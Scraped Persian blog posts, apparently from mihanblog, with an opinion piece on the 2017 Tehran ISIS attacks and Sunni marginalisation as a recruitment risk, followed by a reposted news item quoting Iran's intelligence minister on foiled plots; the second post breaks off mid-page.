امنیتی کشور ما و دیگر کشورها، هوشیار متعهد و قدرتمند باشند، باز هم امکان رخنه و نفوذ تروریست ها وجود دارد. چرا که ماهیت ویژه ی گروه تروریستی - انتحاری داعش، مانند یک جسم بی شکل و بی هندسه است که امکان اندازه گیری ابعاد و مساحت آن، بسیار دشوار است. آیا غیر از این است که این گروه وحشی، با کامیون و تریلی می تواند به مردم عادی هجوم برده و آنها را زیر بگیرد؟ آیا برای این گروه تکفیری، مسموم کردن منابع آب شبکه های شهری، ساخت بمب های دست ساز، به آتش کشیدن منابع عظیم غذایی و کشاورزی، حمله به مدارس و بازارهای شلوغ شهرهای مختلف ایران، کار دشواری است؟ اساسا یک سرویس کارکشته ی امنیتی، هر اندازه که اطلاعات به روز و تجهیزات پیشرفته و کادرهای جان بر کف داشته باشد، باز هم می تواند تمام تحرکات چنین گروه تروریستی ویژه ای را محاسبه و خنثی کند؟ خیر. چنین چیزی ممکن نیست. در روسیه، فرانسه، انگلیس، ترکیه، مصر و بسیاری کشورهای دیگر، پیش بینی حملات و مقابله با آنها میسر نبود و در تهران نیز با وجود آن که میزان تلفات پایین بود، اما در هر حال، بدون تعارف بپذیریم که حمله به مجلس، مطلقا کار کوچک و بی اهمیتی نیست و رئیس مجلس نیز در آن شرایط خاص اضطراری برای تقویت روحیه ی خود و همکارانش این اقدام را «سبک» توصیف کرد! اگر نه او و دیگران، باهوش تر از آن هستند که اهمیت چنین اقدام ضدامنیتی و خطرناکی را درک نکنند. خوب... . چاره چیست؟ آیا باید با پذیرش این فرضیه که ماهیت ویژه و انتحاری بودن داعش، این گروه را به یک نهاد تروریستی غیرقابل پیش بینی تبدیل کرده، در بر ابر آنان تسلیم شویم و هیچ اقدامی انجام ندهیم؟ صد البته خیر. نه ایران و نه دیگر کشورهای منطقه، با وجود تمام ویژگی های عملیاتی خاص داعش، نباید تسلیم اقدامات وحشیانه ی این گروه شوند. از تلاش برای به دام انداختن مهره های بزرگ داعش و استفاده از آنها به عنوان گروگان گرفته تا کنترل دقیق تر مرزها و افزایش آگاهی مردم از راه آموزش های عمومی رسانه ای، می توان، ده ها تدبیر امنیتی مهم و استراتژیک، طراحی و اتخاذ کرد. اما شاید یکی از مهم ترین تدابیر، پیشگیری اجتماعی و سیاسی و ساختن سدّهای بزرگ در برابر یارگیری داعش در ایران باشد.<br><strong>تحلیل&nbsp;پیام های ویدیوی داعشی ها در تهران</strong><br>داعش به تازگی، فیلمی از تروریست های این گروه در تهران منتشر کرده که در آن، یکی از افراد، به زبان کُردی صحبت می کند و زیرنویس عربی حرف های او، در زیر تصویر درج می شود. از میان حرف های این تروریست، سه نکته بسیار برجسته تر از سایر نکات است: 1.فرد تروریست، مسلمانان شیعه مذهب ایران را «رافضی» قلمداد کرده و مدعی می شود: «آنها فرقه هستند، ولی ما امت هستیم. ما نباید بگذاریم آنها زنده بمانند. به یاری پروردگار سرهای آنها را ببریم، سرهای آنها را له کنیم.» 2.تروریست مزبور، ا زاحمد بن حنبل یاد می کند و نشان می دهد که او و همفکرانش برخلاف کردهای اهل سنت ایران، که همگی شافعی مذهب هستند، به مذهب حنبلی گرایش دارند. می دانیم که شافعی مذهب ها، شامل مسلمانان اندونزی، مالزی، بخشی از مصر، ساکنان نواز غزه و کردها هستند. مذهب شافعی از منظر فقهی، مبانی ترکیبی عراقی - حجازی داشته و در قبال مسائل مختلف دینی، با اتکای بیشتر به حدیث، از انعطاف بیشتری نسبت به دیگر مذاهب اهل سنت برخوردار است و علاوه بر این، شافعی مذهب ها، نه تنها تنش و اختلافی با اهل بیت ندارند بلکه ارادت ویژه ای به ائمه ی معصومین علیهم السلام دارند. حال آن که، مذهب حنبلی، تقریبا فقط در عربستان سعودی پیروان دارد و رویکردهای جزمی، سخت و متفاوتی نسبت به دیگر مذاهب و دیگر افکار دینی دارد.3. تروریست مورد نظر ما، از مردم می خواهد راه او و همفکرانش را ادامه دهند و نگذارند این «شمع» خاموش شود! <br><strong>وضعیت اهل سنّت در غرب ایران و امکان یارگیری داعش </strong><br>هر کدام از گروه های تروریستی، با هر گرایش سیاسی و دینی خاصی، برای یارگیری و جذب نیروهای جدید، نیاز به دستاویزها و بهانه هایی دارند که بتوانند با استفاده از آنها، سوژه های جدید را از راه به در برده و مغر آنها را شستشو دهند. صد البته این افراد برای جذب کادرهای جدید، در شرایطی می توانند موفق تر عمل کنند که دستاویزهای ملموسی برای اقناع افراد، در دست داشته باشند. در چنین شرایطی است که رویکرد نظام و نهادهای حکومتی در قبال قومیت ها و مذاهب، اهمیت ویژه ای پیدا می کند. متاسفانه، بدون تعارف باید گفت، در شرایط کنونی در اغلب مناطق کردنشین و سنّی نشین، شرایطی در جریان است که وصف آن، جز با به کار بردن الفاظی همچون «تبعیض»، «بی مهری»، «به حاشیه راندن» و «کم توجهی و بی توجهی»، ممکن نیست. حالا که در این یادداشت، قرار است به مساله ی داعش و رویکرد جمهوری اسلامی ایران در قبال مسلمانان اهل سنّت داخل ایران پرداخته شود، مساله ی قومیت ها و محرومیت های مناطق کردنشین را به کناری نهاده و فقط به مساله ی اهل سنت می پردازیم. شاید در خلال این بحث روشن شود که هر گونه غفلت و خطایی در این حوزه، تا چه اندازه می تواند برای داعش و دیگر گروه های افراطی و سلفی، امکان سوءاستفاده فراهم آورد.<br>برای تبیین مشکلات این بخش، چه مصداق و استدلالی روشن تر از این می توان ارائه داد که چهل سال از عمر جمهوری اسلامی ایران گذشته است ولی هنوز هم اهل سنّت درمناصب اجرایی، جایگاهی ندارند؟ آیا به راستی، از میان چند میلیون مسلمان اهل سنت ایران، هیچ کدام از آنها لیاقت، صلاحیت، توانایی و اعتبار لازم برای فعالیت به عنوان وزیر را ندارند؟ وزارت پیشکش. آیا نصب استاندار سنّی مذهب، با آمال و آرمان های انقلاب، نظام و مبانی مذهب رسمی کشور، منافات بنیادین دارد؟ هم اکنون در استان کردستان، چند مدیرکل اهل سنت در حال فعالیت هستند؟ مساله ی تشیع و تسنن در معادلات استخدامی و گزینشی کشور، تا چه اندازه مشکل ساز شده است؟ آیا زمان آن نیست که تعارفات را کنار گذاشته و به خودمان بیاییم؟ <br>برای روشن شدن ابعاد تلخ این حقایق، لازم نیست حتما به آرشیو خاطرات دور مراجعه کنیم. همین یک ماه پیش و در انتخابات شورای اسلامی تهران، یک نامزد اهل سنت که سابقه ی فرمانداری یک شهر حساس را در کارنامه دارد، از حوزه انتخابیه ی تهران وارد میدان شد و صلاحیت او تایید شد. اما برخی از آقایان، همین که دیدند فرد موردنظر در لیست امید جای گرفته و به احتمال 99 درصد به شورای شهر تهران راه می یابد، بی هیچ توضیحی صلاحیت او را - پس از انتشار لیست- رد کرده و نامش را خط زدند. در همین انتخابات، در استان کردستان، داد روحانیون و ماموستاهای اهل سنت درآمد که چرا در شورای نظارت انتخابات استان، از ظرفیت های ما استفاده نمی کنید. اندکی قبل از آن و در انتخابات مجلس خبرگان، نماینده ی ولی فقیه در استان کردستان که شانس و امیدی به پیروزی در زادگاه خود یا تهران و قم نداشت، از حوزه انتخابیه استان کردستان نامزد شد و برای اولین بار با به راه انداختن دوقطبی شیعی - سنی، پیروز شد و این در حالی بود که در چهار دهه ی اخیر، هر دو کرسی کردستان در مجلس خبرگان از آن ماموستایان اهل سنت بوده و کسی به این امر معترض نشده بود. <br>تمام تلاش های روحانی در دولت اول، برای بهره گیری از ظرفیت های اهل سنت، صرفا به معرفی یک سفیر اهل سنت ختم شد. آن هم نه در یک کشور اسلامی عربی مهم بلکه در کامبوج! جناب مستطاب وزیر کشور، آقای رحمانی فضلی در جریان معرفی استاندار کردستان، وقتی که در برابر درخواست های مکرر نمایندگان و نخبگان برای معرفی یک استاندار بومی کُرد یا اهل سنت قرار گرفت، اعلام فرمود که چنین ظرفیتی در میان کادرهای منطقه وجود ندارد و نتوانسته فردی را پیدا کند که سزاوار این پست باشد!<br>از این ها گذشته، موقعیت روحانیون و ماموستاهای دینی اهل سنت در استان کردستان، آذربایجان غربی و کرمانشاه، به گونه ای است که از کمترین توان و امکان اثرگذاری برای هدایت مردم و به ویژه جوانان برخوردارند. اگر چه بسیاری از طلاب و روحانیون اهل تشیع نیز از امکانات و تمکن مالی چندان مطلوبی برخوردار نیستند اما شک نکنید که موقعیت مالی، اجتماعی و امکانات روحانیون اهل سنت، تاسف برانگیز است و در شرایطی که کانال های افراطی عربستان، برای تهییج و تحریک و تحریف جوانان اهل سنت ایران، دام پهن کرده اند، روحانی سنی مذهب، فضا و امکان تبلیغ و هدایت ندارد. در شرایطی که استان کردستان، مهد فرهنگ و هنر است و صدها هنرمند شریف و ماموستای دینی قابل اعتماد وجود دارد، پست مدیرکل فرهنگ و ارشاد اسلامی استان کردستان، مدت ها خالی ماند تا بالاخره یک روحانی اهل تشیع را از استانی دیگر، به عنوان مدیرکل فرهنگ و ارشاد اسلامی به استان کردستان آوردند. فرض کنیم تصور غلط و حاکی از بی مهری وزیر کشور صحیح باشد و هیچ کدام از نخبگان نسل جدید کُرد و اهل سنت، در قد و قامت استاندار شدن نباشند و نتوان به آنها اعتماد کرد. اما آیا صدها فرمانده ی سپاهی کُرد و اهل سنت آن مناطق که در جریان جنگ، از مرزها دفاع کردند، با احزاب ضد انقلاب کُرد جنگیدند و خود و خانواده هایشان را در برابر هجمه و توهین قرار دادند، آنان نیز شایان اعتماد نیستند؟ نه تنها در غرب ایران، بلکه در تهران نیز، فعالان دینی اهل سنّت، برای گرد هم آمدن، سر دادن نوای وحدت و تقریب و اقامه ی نماز جمعه، از هیچ امکانی برخوردار نیستند.</font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"> </font></span></font><p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"><strong>قرائت نهایی از متن اهل سنت در ایران</strong><br>می توان از چندین منظر مختلف، در مورد این نوشته و متن کلانی به نام اهل سنت ایران، در مقام یک واقعیت اجتماعی اظهار نظر کرد. می توان گفت: «دستگاه های اطلاعاتی کشور اعلام کرده اند که از بین کل اهل سنت ایران، نهایتا چهل - پنجاه نفر به داعش پیوسته اند و چنین چیزی نیاز به اغراق و بزرگ نمایی ندارد. موضوع را کنترل می کنیم. قرار نیست به خاطر این مسائل، نگران شویم.» می توان از منظری دیگر همچون وزیر کشور به مسائل نگاه کرد و گفت: «قرار نیست از وقایع تهران استفاده ی سیاسی شود و این مساله به توجیهی شود برای پست دادن به اذهل سنت و کردها و دیگران.» شاید هم می توان چنین به موضوع نگاه کرد که ایران اسلامی، از آنِ همه ی ماست. نه تنها در تراژدی ها و وقایع تروریستی، بلکه در شادی و نعمت و توسعه نیز، همه در کنار هم هستیم و وحدت و انسجام ماست که می تواند راه بر نفوذ کوردلان و نیروهای افراطی ببندد. <br>یک جوان کُرد یا بلوچ یا ترکمن اهل سنت نیز، می تواند به اندازه ی یک جوان تهرانی و خراسانی اهل تشیع، عاشق و حافظ این خاک و این دیار باشد و به آن خدمت کند. می توان با نگاهی تحلیلی و دور از حب و بغض و همچنین دور از غرض و مرض، راه بر تکرار خطاهای پیشین بست و در نگاهی نو و رئوف، در مسیر هدایت جامعه ی اهل سنت به سوی اسلام ناب و رحمانی، یار و یاور روحانیون و ماموستایان و مولوی های اهل سنت شد و به وهابی ها و سلفی ها و داعشی ها، اجازه نداد که در افکار و قلوب اهل سنت ایران، نفوذ کنند.</font></span></font></p> </div><br> <b></b> <font style="font-size:8pt;"> <br> <font size="3">برچسب ها: <a href="/post/tag/حملات تروریستی تهران">حملات تروریستی تهران</a>، <a href="/post/tag/اختلافات مذهبی شیعه و سنی">اختلافات مذهبی شیعه و سنی</a>، <a href="/post/tag/داعشی های ایرانی">داعشی های ایرانی</a>، <a href="/post/tag/پیش بینی حملات داعش">پیش بینی حملات داعش</a>، <a href="/post/tag/یارگیری داعش در ایران">یارگیری داعش در ایران</a>، <a href="/post/tag/اهل سنّت غرب ایران">اهل سنّت غرب ایران</a>، <a href="/post/tag/دستاویزها و بهانه های داعش">دستاویزها و بهانه های داعش</a>،</font><br><br><br></font> </div> text/html 2017-06-10T23:10:12+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی اگر روزی صد بُمب خنثی شود کسی نمی-فهمد!؟ ... http://1001SHAYADOBAYAD.mihanblog.com/post/3512 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div><br><br><br><br><h1><a target="_blank" href="http://rooydad24.com/13590671/%D8%AC%D8%B2%DB%8C%DB%8C%D8%A7%D8%AA_%D8%AD%D9%85%D9%84%D9%87_%D8%AA%D8%B1%D9%88%D8%B1%DB%8C%D8%B3%D8%AA%DB%8C_%D8%AA%D9%87%D8%B1%D8%A7%D9%86_%DA%A9%D8%A7%D9%85%D9%84%D8%A7_%D8%A7%D8%AB%D8%B1_%D8%A7%D9%86%DA%AF%D8%B4%D8%AA_%D8%B3%D8%B9%D9%88%D8%AF%DB%8C_%D9%87%D8%A7_%D8%AF%D8%B1_%D8%AD%D9%85%D8%A7%DB%8C%D8%AA_%D8%A7%D8%B2_%D8%AA%D8%B1%D9%88%D8%B1%DB%8C%D8%B3%D8%AA_%D9%87%D8%A7_%D8%AF%D8%B1_%D8%B9%D8%B1%D8%A7%D9%82_%D9%88_%D8%B3%D9%88%D8%B1%DB%8C%D9%87_%D9%85%D8%B4%D9%87%D9%88%D8%AF_%D8%A7%D8%B3%D8%AA"><font color="#000099"><span style="background-color: rgb(255, 255, 204);"><font size="6" face="arial,helvetica,sans-serif">&nbsp;اگر روزی صد بُمب خنثی شود کسی نمی-فهمد!؟ ...&nbsp;&nbsp; </font></span></font><br></a></h1><br><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTtoX0Nw3f7hPltOvyqI2wlmXfvb7A-Pr-DegYFM8T36_noXiSF" alt="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTtoX0Nw3f7hPltOvyqI2wlmXfvb7A-Pr-DegYFM8T36_noXiSF" height="332" width="500"><br><br><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTg97lbETemzNLohXvOWXnADbA71em2_AngvxiA39f-rEjaEdMk" alt="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTg97lbETemzNLohXvOWXnADbA71em2_AngvxiA39f-rEjaEdMk" height="298" width="502"><br><br><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQY8FfEXu60FKCyZc7qwVnpBgggvoK5zSJ70m8ej5whvP4l-c3qxw" alt="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQY8FfEXu60FKCyZc7qwVnpBgggvoK5zSJ70m8ej5whvP4l-c3qxw" height="349" width="503"><br><br><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS-ynaZQS3-a2TNYr3sXlFAQu1MGcfDMqKxyvdNlJd7SxClaLe3" alt="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS-ynaZQS3-a2TNYr3sXlFAQu1MGcfDMqKxyvdNlJd7SxClaLe3" height="355" width="505"><br><br><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ2cUbNLsheWw_Ccrq4wpISvj-yED0jHaD0qKgBd8Qh4YR5OtQhsQ" alt="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ2cUbNLsheWw_Ccrq4wpISvj-yED0jHaD0qKgBd8Qh4YR5OtQhsQ" height="501" width="501"><br><br><br><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTAdeqzBRhlam2p6DPdzJpYPtzMrsaaUmOSD330fUR4ssBP-ISHSA" alt="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTAdeqzBRhlam2p6DPdzJpYPtzMrsaaUmOSD330fUR4ssBP-ISHSA" height="233" width="483"><br><br><br><p align="justify"><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak">به گزارش ایسکانیوز، سیدمحمود علوی <a href="http://rooydad24.com/13576280/%DA%AF%D8%B2%D8%A7%D8%B1%D8%B4_%D8%A7%D9%8A%D8%B3%D9%86%D8%A7_%D8%A7%D8%B2_%D8%A7%D8%AE%D8%A8%D8%A7%D8%B1_%D8%AD%D8%A7%D8%AF%D8%AB%D9%87_%D8%AA%D9%8A%D8%B1%D8%A7%D9%86%D8%AF%D8%A7%D8%B2%D9%8A_%D8%AF%D8%B1_%D9%85%D8%AC%D9%84%D8%B3_%D9%88_%D8%AD%D8%B1%D9%85_%D8%A7%D9%85%D8%A7%D9%85_%D8%B1%D9%87">صبح امروز</a> در جریان بازدید از مجروحان <a href="http://rooydad24.com/13583172/%D9%85%D8%B3%D8%A6%D9%88%D9%84_%D8%AF%D9%81%D8%AA%D8%B1_%D9%86%D9%85%D8%A7%DB%8C%D9%86%D8%AF%D9%87_%D8%A7%D8%B1%D9%88%D9%85%DB%8C%D9%87_%D8%A8%D9%87_%D8%B4%D9%87%D8%A7%D8%AF%D8%AA_%D8%B1%D8%B3%DB%8C%D8%AF">حادثه تروریستی</a> دیروز تهران در <a href="http://rooydad24.com/13577115/%D8%A7%D8%B3%D8%A7%D9%85%DB%8C_2_%DA%A9%D8%B4%D8%AA%D9%87_%D9%88_31_%D9%85%D8%B5%D8%AF%D9%88%D9%85_%D8%AA%DB%8C%D8%B1%D8%A7%D9%86%D8%AF%D8%A7%D8%B2%DB%8C_%D8%AA%D8%B1%D9%88%D8%B1%DB%8C%D8%B3%D8%AA%DB%8C_%D8%AF%D8%B1_%D9%85%D8%AC%D9%84%D8%B3_%D9%88_%D8%AD%D8%B1%D9%85_%D9%85%D8%B7%D9%87%D8%B1_%D8%A7%D8%B9%D9%84%D8%A7%D9%85_%D8%B4%D8%AF">بیمارستان طرفه</a> در مورد پیگیری این اتفاق اظهار کرد: عقبه این <a href="http://rooydad24.com/13576649/%D8%AF%D8%B3%D8%AA%DA%AF%DB%8C%D8%B1%DB%8C_%DB%8C%DA%A9_%D8%AA%DB%8C%D9%85_%D8%AA%D8%B1%D9%88%D8%B1%DB%8C%D8%B3%D8%AA%DB%8C_%D8%AF%D8%B1_%D8%AA%D9%87%D8%B1%D8%A7%D9%86">تیم تروریستی</a> <a href="http://rooydad24.com/13576826/%D8%B4%D9%86%D8%A7%D8%B3%D8%A7%DB%8C%DB%8C_%DB%B1%DB%B1%DB%B5_%D9%85%D8%AD%D9%88%D8%B7%D9%87_%D9%BE%DB%8C%D8%B4_%D8%A7%D8%B2_%D8%AA%D8%A7%D8%B1%DB%8C%D8%AE_%D8%AF%D8%B1_%D8%B1%D9%88%D9%85%D8%B4%DA%A9%D8%A7%D9%86">شناسایی شده</a> و تعدادی از اعضای آن‌ها را همکاران ما دستگیر کرده‌اند و در <a href="http://rooydad24.com/13564071/%D8%AA%D8%A3%DB%8C%DB%8C%D8%AF_%D8%A7%D9%86%D8%AA%D8%AE%D8%A7%D8%A8%D8%A7%D8%AA_%D8%B4%D9%88%D8%B1%D8%A7%D9%87%D8%A7_%D8%AF%D8%B1_8_%D8%AD%D9%88%D8%B2%D9%87_%D8%A7%D8%B3%D8%AA%D8%A7%D9%86_%D8%AA%D9%87%D8%B1%D8%A7%D9%86_%D8%AA%D8%A7_%D9%BE%D8%A7%DB%8C%D8%A7%D9%86_%D9%87%D9%81%D8%AA%D9%87_%D8%A8%D8%B1%D8%B1%D8%B3%DB%8C_%D8%A7%D9%86%D8%AA%D8%AE%D8%A7%D8%A8%D8%A7%D8%AA_%D8%AF%D8%B1_%D9%BE%D8%B1%D9%86%D8%AF_%D9%88_%DA%A9%D9%87%D8%B1%DB%8C%D8%B2%DA%A9">حال بررسی</a> ابعاد موضوع هستند، البته برخی از ابعاد حادثه فعلا قابل گفتن نیست.</font></span></font></p><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak"> </font></span></font><p align="justify"><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak">وی در ادامه افزود: <font color="#CC0000">این اقدام اولین طرح تروریست‌ها نبود</font> <font color="#006600"><span style="background-color: rgb(255, 255, 255);">و در <a href="http://rooydad24.com/13565860/%D9%85%DB%8C%D8%B1%D8%B4%DA%A9%D8%A7%DA%A9_%D9%88%D8%AD%D8%B4%D8%AA_%D8%A8%D8%B2%D8%B1%DA%AF_%D8%A8%D8%B4%D8%B1_%DA%A9%D9%86%D9%88%D9%86%DB%8C_%DA%AF%D8%B1%D8%B3%D9%86%DA%AF%DB%8C_%D8%A7%D8%B3%D8%AA_%D8%A8%D9%87_%DB%8C%DA%A9_%D8%B1%D8%A8%D8%A7%D8%AA_%D8%AC%D8%A7%D9%86%D8%AF%D8%A7%D8%B1_%D8%AA%D8%A8%D8%AF%DB%8C%D9%84_%D8%B4%D8%AF%D9%87_%D8%A7%DB%8C%D9%85">یکی دو</a> <a href="http://rooydad24.com/13567342/%D9%85%D9%86%D8%B5%D9%88%D8%B1%DB%8C%D8%A7%D9%86_%D8%B2%D9%85%D8%A7%D9%86%DB%8C_%D8%B1%D8%A7_%D9%86%D9%85%DB%8C_%D8%B4%D9%86%D8%A7%D8%B3%D9%85_%D8%A7%D9%88_%D9%85%DB%8C_%D8%AA%D9%88%D8%A7%D9%86%D8%AF_%D8%B5%D8%A8%D8%AD_%D8%AA%D8%A7_%D8%B4%D8%A8_%D8%AD%D8%B1%D9%81_%D8%A8%D8%B2%D9%86%D8%AF_%D8%A7%D8%B2_%D8%A7%D9%87%D8%AF%D8%A7%D9%81_%D8%AE%D9%88%D8%AF%D9%85_%D8%B9%D9%82%D8%A8_%D9%86%D8%B4%DB%8C%D9%86%DB%8C_%D9%86%D9%85%DB%8C_%DA%A9%D9%86%D9%85">سال گذشته</a> بیش از ۱۰۰ طرح تروریستی داشتند که خنثی شده بود.</span></font> در ماه اخیر و روزهای اخیر شاهد یک فشار سنگینی از ناحیه تروریست‌ها بودیم؛ به طوری که تقریبا هر هفته تیم‌های دو نفره، سه نفره یا افرادی که به صورت انفرادی فعالیت می‌کردند را شناسایی و دستگیر کرده‌ایم.</font></span></font></p><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak"> </font></span></font><p align="justify"><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak">وزیر اطلاعات در مورد دستگیری تروریست‌ها نیز گفت: ذکر همه این اطلاعات فعلا مفید نیست چون باعث تشویش خاطر شهروندان می‌شود. به هر حال<span style="background-color: rgb(255, 255, 204);"> در <a href="http://rooydad24.com/13573235/%D8%B4%D8%A8%DA%A9%D9%87_%D8%AA%D9%87%D8%B1%D8%A7%D9%86_%D8%A7%D9%81%D8%AA_%D9%85%D8%AE%D8%A7%D8%B7%D8%A8_%D9%86%D8%AF%D8%A7%D8%B4%D8%AA%D9%87_%D8%A7%D8%B3%D8%AA">دو سال</a> اخیر بیش از ۱۰۰ برنامه آنها خنثی شده است.</span> من پیش از این نیز گفته‌ام اگر یک بمب منفجر شود همه مطلع می‌شوند، اما <span style="background-color: rgb(255, 255, 204);">اگر صد بمب خنثی شود کسی خبردار نمی‌شود.</span> برنامه ما هم همین است که این اتفاقات کمتر به اطلاع مردم برسد<span style="background-color: rgb(255, 255, 204);"> چون آرامش روانی و بهداشت روحی مردم را ضروری می‌دانیم و مناسب نمی‌دانیم با چنین اخباری با آرامش مردم بازی شود. </span>آرامش مردم <a href="http://rooydad24.com/13565211/%D8%B7%D8%B1%D8%AD_%D8%B5%DB%8C%D8%A7%D9%86%D8%AA_%D8%A7%D8%B2_%D8%A8%D8%A7%D8%BA%D8%A7%D8%AA_%D8%B4%D9%87%D8%B1_%D8%AA%D9%87%D8%B1%D8%A7%D9%86_%D8%A8%D8%B1%D8%A7%DB%8C_%D8%B3%D9%88%D9%85%DB%8C%D9%86_%D8%A8%D8%A7%D8%B1_%D8%A8%D8%B1%DA%AF%D8%B4%D8%AA_%D8%AE%D9%88%D8%B1%D8%AF">برای ما</a> مهم‌تر از <a href="http://rooydad24.com/13572567/%D9%85%D8%A7%D8%AC%D8%B1%D8%A7%DB%8C_%D8%AF%DB%8C%D8%AF%D8%A7%D8%B1_%D8%AE%D8%B5%D9%88%D8%B5%DB%8C_%D8%B1%D9%87%D8%A7%D9%85%DB%8C_%D8%A8%D8%A7_%D8%B1%D9%88%D8%AD%D8%A7%D9%86%DB%8C">اطلاع رسانی</a> در این مسائل است.</font></span></font></p><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak"> </font></span></font><p align="justify"><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak">وی با بیان اینکه با اشراف بیشتر بر تروریست‌ها تحرکات آنها را رصد کرده و آنها را زیر ضربه می‌بریم تصریح کرد: ما از مردم می خواهیم آرامش خود را حفظ کرده و اگر با مورد مشکوکی برخورد کردند به ۱۱۳ اطلاع دهند. بسیاری از اطلاعاتی که ما از تروریست‌ها به دست می‌آوریم را از طریق مردم به دست می‌آوریم. ما معتقدیم با این ترقه بازی‌ها به تعبیر <a href="http://rooydad24.com/13573493/%D8%B1%D9%87%D8%A8%D8%B1_%D8%A7%D9%86%D9%82%D9%84%D8%A7%D8%A8_%D8%B1%D9%88%D8%B2%D8%A7%D9%86%D9%87_%DA%86%D9%86%D8%AF_%D8%B3%D8%A7%D8%B9%D8%AA_%DA%A9%D8%A7%D8%B1_%D9%85%DB%8C_%DA%A9%D9%86%D9%86%D8%AF">رهبر انقلاب</a> امنیت بی بدیل کشور آسیب نمی‌بیند. دستگاه‌های مختلف امنیتی، نظامی، انتظامی و قضائی، <a href="http://rooydad24.com/13583879/%D8%A8%D8%A7_%D9%88%D8%AC%D9%88%D8%AF_%D9%85%D8%B4%DA%A9%D9%84%D8%A7%D8%AA_%D9%85%D8%A7%D9%84%DB%8C_%D8%AC%D9%88%D8%A7%D9%86%D8%A7%D9%86_%D8%A8%D9%87_%D8%AC%D9%87%D8%A7%D9%86%DB%8C_%D8%A7%D8%B9%D8%B2%D8%A7%D9%85_%D9%85%DB%8C_%D8%B4%D9%88%D9%86%D8%AF">شورای عالی</a> <a href="http://rooydad24.com/13565067/%D8%B4%D9%85%D8%AE%D8%A7%D9%86%D9%8A_%D9%87%D9%85%DA%A9%D8%A7%D8%B1%D9%8A_%D9%87%D8%A7%D9%8A_%D8%B1%D8%A7%D9%87%D8%A8%D8%B1%D8%AF%D9%8A_%D8%A7%D9%8A%D8%B1%D8%A7%D9%86_%D9%88_%D8%B1%D9%88%D8%B3%D9%8A%D9%87_%D8%AF%D8%B1_%D8%B3%D9%88%D8%B1%D9%8A%D9%87_%D9%85%D8%B9%D8%A7%D8%AF%D9%84%D8%A7%D8%AA_%D8%B3%D9%8A%D8%A7%D8%B3%D9%8A_%D8%B1%D8%A7_%D8%AA%D8%BA%D9%8A%D9%8A%D8%B1_%D8%AF%D8%A7%D8%AF%D9%87_%D8%A7%D8%B3%D8%AA">امنیت ملی</a>، <a href="http://rooydad24.com/13561766/%DA%AF%D8%B2%D8%A7%D8%B1%D8%B4_%D8%A7%D9%86%D8%AA%D8%AE%D8%A7%D8%A8%D8%A7%D8%AA%DB%8C_%D8%B1%D8%AD%D9%85%D8%A7%D9%86%DB%8C_%D9%81%D8%B6%D9%84%DB%8C_%D8%A8%D9%87_%D9%85%D8%AC%D9%84%D8%B3">وزارت کشور</a> و <a href="http://rooydad24.com/13585202/%D8%AA%D8%B1%D9%88%D8%B1%D8%B1%DB%8C%D8%B3%D9%85_%D8%B1%D8%A7_%D8%AF%D8%B1_%D9%87%D9%85%D9%87_%D8%A7%D8%B4%DA%A9%D8%A7%D9%84_%D9%85%D8%AD%DA%A9%D9%88%D9%85_%D9%85%DB%8C_%DA%A9%D9%86%DB%8C%D9%85_%D8%A7%D8%A8%D8%B1%D8%A7%D8%B2_%D9%87%D9%85%D8%AF%D8%B1%D8%AF%DB%8C_%D8%B9%D9%85%DB%8C%D9%82_%D8%A8%D8%A7_%D9%85%D9%84%D8%AA_%D8%A7%DB%8C%D8%B1%D8%A7%D9%86">شورای امنیت</a> با <a href="http://rooydad24.com/13581892/%D8%A8%D8%A7_%D9%88%D8%AD%D8%AF%D8%AA_%D9%88_%D9%87%D9%85%D8%AF%D9%84%DB%8C_%D8%A8%D8%A7%DB%8C%D8%AF_%D8%AA%D9%88%D8%B7%D8%A6%D9%87_%D9%87%D8%A7%DB%8C_%D8%A7%D8%B3%D8%AA%DA%A9%D8%A8%D8%A7%D8%B1_%D8%AC%D9%87%D8%A7%D9%86%DB%8C_%D8%B1%D8%A7_%D8%AE%D9%86%D8%AB%DB%8C_%DA%A9%D9%86%DB%8C%D9%85">وحدت و همدلی</a> و هم افزایی در جهت برقراری <a 